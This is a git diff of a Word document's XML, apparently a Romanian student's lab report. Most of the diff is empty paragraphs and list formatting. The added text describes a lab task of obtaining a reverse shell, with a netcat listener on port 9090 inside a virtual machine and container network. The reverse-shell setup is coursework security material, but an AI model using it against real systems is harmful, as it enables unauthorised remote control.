+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
@@ -4713,7 +5057,7 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId30"/>
+      <w:headerReference w:type="default" r:id="rId32"/>
       <w:type w:val="nextPage"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:left="1440" w:right="1440" w:header="720" w:top="777" w:footer="0" w:bottom="1440" w:gutter="0"/>
@@ -5874,6 +6218,280 @@
   <w:abstractNum w:abstractNumId="9">
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3960"/>
+        </w:tabs>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="10">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="11">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
       <w:numFmt w:val="none"/>
       <w:suff w:val="nothing"/>
       <w:lvlText w:val=""/>
@@ -6016,6 +6634,12 @@
   </w:num>
   <w:num w:numId="9">
     <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="10">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="11">
+    <w:abstractNumId w:val="11"/>
   </w:num>
 </w:numbering>
 </file>

--- a/L07/Birlutiu_Claudiu_L07/SablonRaportL07.docx
+++ b/L07/Birlutiu_Claudiu_L07/SablonRaportL07.docx
@@ -4736,287 +4736,848 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>Ideea acestei sarcini consta in obtinerea unui reverse shell, un proces este lansat pe masina aflata la distanta, iar intrarea si iesirea sa sunt controlate de la distanta de pe un alt calculator</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="143"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">programul folosit pentru deschiderea unor astfel de conexiuni este </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">netcat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> prin optiune -l va deveni un server de TCP care asculta o conexiune pe portu specificat</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>Vom folosis netcat pe masina virtuala pentru a asculta pe portul 9090; observam la rularea pe masina virtuala a comenzii ifconfig reteaua 10.0.9.1 in care ruleaza containerul</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="22">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5715000" cy="2604135"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="21" name="Image21" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="21" name="Image21" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId32"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="2604135"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
